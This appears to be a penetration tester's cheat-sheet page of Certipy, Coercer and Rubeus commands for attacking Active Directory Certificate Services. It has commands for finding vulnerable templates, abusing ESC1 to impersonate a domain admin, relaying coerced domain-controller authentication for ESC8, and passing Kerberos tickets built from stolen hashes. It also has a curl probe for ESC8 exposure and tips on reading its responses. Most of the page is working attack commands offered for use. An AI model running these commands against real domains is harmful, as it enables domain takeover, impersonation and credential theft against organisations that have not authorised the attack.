Skip to main content

certipy.py

Find all certs

certipy find -u user@domain.com -p '' -debug
  • Hint: use -scheme ldap if you get a bunch of annoying ldap errors!)

Find all VULNERABLE certs

certipy find -vulnerable -u user@domain.com -p '' -debug
  • Hint: use -scheme ldap if you get a bunch of annoying ldap errors!)

Abuse ESC1

sudo certipy req -username lowpriv@domain.com -password 'winter2021' -ca CA-01 -target vulnerableCA.domain.com -template 'vuln-template' -upn da-i-want-to-impersonate@domain.com -dns fqdn-of-a-dc.domain.com -key-size 4096

Auth with the cert you just got

certipy auth -pfx administrator.pfx -dc-ip 172.16.126.128

Abuse ESC8 (DC example)

certipy relay -target vulnca.domain.com -template DomainController / KerberosAuthentication /DC

Coerce auth

sudo python3 /opt/coercer/Coercer.py coerce -u lowpriv -p 'Winter2024!' -t ip.of.a.dc -l my.attacking.ip.addy

Abuse the cert

certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIER

Note: in the asktgt part above, if you've stolen a machine hash then you should make the user part be /user:DC01$

Sanity check the CA is vulnerable to ESC8 with curl!

curl -sSLkI -u 'NETBIOS-NAME-OF-DOMAIN\user:password' --ntlm 'https://name.of.the.ca/certsrv/certfnsh.asp' 
tip

If you run this curl command on Windows, use double quotes! (h/t fastchar)

If you get 401 unauthorized the endpoint is likely still vulnerable. Every time I've seen this and also received a header of WWW-Authenticate: NTLM the host has been vulnerable to ESC8.

On the other hand, I believe a 403 error indicates the endpoint has been hardened and/or the attack won't work.

On a recent assessment I got 401 unauthorized but the endpoint wasn't vulnerable. So I'm still not 100% how to determine vulnerability status unless I test it manually or just do certipy find -vulnerable

warning

If I call this file certipy.md in the file hierarchy, docusaurus crashes. Wassupwitdat? I raised an issue in GitHub for this.